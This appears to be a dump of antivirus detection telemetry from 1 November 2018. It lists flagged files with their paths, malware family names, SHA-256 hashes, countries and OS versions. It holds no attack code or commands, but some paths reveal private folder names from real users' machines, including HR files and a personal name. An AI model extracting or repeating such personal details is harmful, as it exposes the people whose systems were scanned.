  Row(detection=Row(filename='avscan-20181101-160005-eb00182c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160005-EB00182C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155809-d795ea0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155809-D795EA0C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:22:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='thr 2017.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\THR 2017\\THR 2017.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T09:43:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.17514_none_75618ca379b78941\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='0ebc7b2c2e54fa07ef88562ec2ffeb2c6320ee013de351ea464cd8b8e1c7ff8b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kontrak 2.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\ALL Data LPA\\PKWT LPA SIGIT\\kontrak 2\\kontrak 2.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='taskeng.exe', filepath='C:\\Windows\\System32\\taskeng.exe', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='baae1a15dd2715e61d17b9832c85d3fe77674867157c467655041e945908fee4', metadata=Row(cmdline='-k netsvcs', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:24:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c0477599c9930cba52d3fb2d9615748671cfac82ef6d1f56a137833f67756ea1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-11.available\\Avira\\C0477599C9930CBA52D3FB2D9615748671CFAC82EF6D1F56A137833F67756EA1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c0477599c9930cba52d3fb2d9615748671cfac82ef6d1f56a137833f67756ea1', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:53:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\Documents and Settings\\X\\Application Data\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:22:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:24:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111559-20820f30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111559-20820F30', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:15:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pconverter.7b4b54ea461842f6af64f10f41f9804a.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.7b4b54ea461842f6af64f10f41f9804a.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T10:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rumomeca.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9322724\\rumomeca.exe', filesize=576000, name='HEUR/AGEN.1000047.#M1.#R1'), hash='607c3b31d74eae6fbd9b348ddac1ec1bb9d1897eb4dffcd415c998dbaf1ff059', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T05:11:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ErnME\\\\\\/6G1kag\\\\\\/nF6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T10:32:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='remotecomputermanager.exe', filepath='K:\\HBCD\\Programs\\REMOTECOMPUTERMANAGER.EXE', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avisynth.dll', filepath='C:\\Program Files\\FreeTime\\FormatFactory\\FFModules\\Encoder\\avisynth.dll', filesize=620000, name='W32/Ramnit.C.#M0.#R0'), hash='a9fe328989608a03eb0291db4eb07635c86f973e02c04529c3aa7dd19bbfa5e7', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T02:49:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='bed1b0dca67ed7f58f03c30178771bee6a91022fecc990b3a4af333ee9548e9f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='chktrust.exe', filepath='j:\\new folder\\halo\\chktrust.exe', filesize=448000, name='W32/Virut.Gen.#M1.#R1'), hash='ab79bcb612c99aacfd976764f2e2a146448642cf2fac43f5860872aa0e527cef', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:36:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215850-4b4afce7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215850-4B4AFCE7', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:58:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170449-33ac1a0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a667259\\AVSCAN-20181101-170435-31A3DD08\\AVSCAN-20181101-170449-33AC1A0A', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:04:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\BetwaypokerMPP\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Microgaming\\Poker\\BetwaypokerMPP\\mppoker.exe', parentsize=1214712, timestamp='2018-11-01T19:29:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='support.exe', filepath='C:\\Users\\X\\Documents\\Dota\\support\\support.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5584f7505eef9a5aa1c3379e0f4272b74450da2f', filepath='C:\\Users\\X\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\r7s2ecj6.default\\cache2\\entries\\5584F7505EEF9A5AA1C3379E0F4272B74450DA2F', filesize=8000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='a670bdcefd413b2a44ae195fd7dc4f777d26e4a3083db3633ffbba757509376d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=510928, timestamp='2018-11-01T04:41:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='559d89a6e034af2ba3fff4fc5baaf5ef08c00fdfe8ff577c65f1d5f8cc2148d2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\559D89A6E034AF2BA3FFF4FC5BAAF5EF08C00FDFE8FF577C65F1D5F8CC2148D2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='559d89a6e034af2ba3fff4fc5baaf5ef08c00fdfe8ff577c65f1d5f8cc2148d2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:14:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='windowsanytimeupgraderesults.exe', filepath='\\\\?\\C:\\Windows\\System32\\WindowsAnytimeUpgradeResults.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='8e443819563221fb34c218381353d70d3cf6d070b7389e6bc9ed2e7e4427edb3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:56:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111131-fec04f26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111131-FEC04F26', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.pif', filepath='\\?\\C:\\Users\\X\\Desktop\\اهنگ فلش\\فیلم انهدام خارجی\\System Volume Information\\System Volume Information.pif', filesize=5952000, name='HEUR/AGEN.1015658.#M1.#R1'), hash='6f59c94a106529163adc6375303d689d70c6c0b312d0d536cd85811fcdf1dd14', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:58:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-140747-77a2c0f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0286de76\\AVSCAN-20181101-140442-574AB5C5\\AVSCAN-20181101-140747-77A2C0F3', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:07:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AUT Client\\instmsiw.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='58976432b3037c64669a08a76209791c56a1c7e76f5ea872de52c4d77314ff22', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2528e6d4b031e1bba32279960faf5552d16d01db6ef30b88a83f5b1b2e765894', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\2528E6D4B031E1BBA32279960FAF5552D16D01DB6EF30B88A83F5B1B2E765894', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2528e6d4b031e1bba32279960faf5552d16d01db6ef30b88a83f5b1b2e765894', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T09:39:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloadtool.exe', filepath='H:\\New folder\\M10F MODIFICATIONS1\\CABLE\\M10F_OpenCPU_GS4_SDK_V1.2\\downtools\\QFlash_V3.3\\QFlash_V3.3\\INT\\CH1\\DownloadTool.exe', filesize=1664000, name='W32/Neshta.A.#M1.#R1'), hash='6c336549c11ddbceea4742bf8d3a617da78d9fd71232eb6209ce42458b00cac4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T16:44:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000143-31383cf3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e01097b3\\AVSCAN-20181102-000124-2E5D0801\\AVSCAN-20181102-000143-31383CF3', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:31:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pfusstwainentry0416.dll', filepath='C:\\Program Files\\fiScanner\\ScandAll PRO\\PfuSsTwainEntry0416.dll', filesize=172000, name='W32/Ramnit.C.#M1.#R1'), hash='84d14f762fb86749aa3ba633b26f035e2d0a43b556bde23228041b4d966e29d0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T02:02:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-135043-38486717', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbb7e663\\AVSCAN-20181101-134907-321D1705\\AVSCAN-20181101-135043-38486717', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:50:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T05:48:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:55:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jl mu.exe', filepath='\\?\\L:\\g العاب\\Fiber Twig\\Data\\JL MU.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='3ce00e24d62cdae7fc030ba646552a2c8200ae28f256d043b6d8e51ea5870287', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:54:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003048-6e846a31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003048-6E846A31', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:30:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ndp46-kb3045557-x86-x64-allos-enu.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\DotNet\\NDP46-KB3045557-x86-x64-AllOS-ENU.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='52d8475c5be4f6e846c1f874db950e23ed62d61eab5235715fdaf5b4917ada19', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:05:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2254.exe', filepath='I:\\.Trashes\\2254.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='83ef079fb538f232884ca1f3c64ad14e939d3ddcf013d1089320abc77477beab', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:20:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181206-e169726f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7beda358\\AVSCAN-20181101-181140-DD3D6CC2\\AVSCAN-20181101-181206-E169726F', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T08:22:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='D:\\3 ث Project\\VBExpress\\autorun.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='655563500c615d82d018840a8dde7d0531fa60aa4b432bccd7347a75ee107301', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T04:25:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:37:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:28:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wdwracing.exe', filepath='e:\\ay 7aga\\crash\\WDWRacing.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='49cf29c609a73ff4439fad86a03b7b2cac183b0b1778b0f7d2f7b36f1d48541e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:18:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-132009-7a44e8e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b18897e6\\AVSCAN-20181101-131504-56DDCCF3\\AVSCAN-20181101-132009-7A44E8E3', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:20:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:43:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc084c06e5-02ee-8b47-9191-6dc27c76d5fb.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc084C06E5-02EE-8B47-9191-6DC27C76D5FB.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T17:22:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:12Z'), dt=datetime.date(2018, 11, 1)),
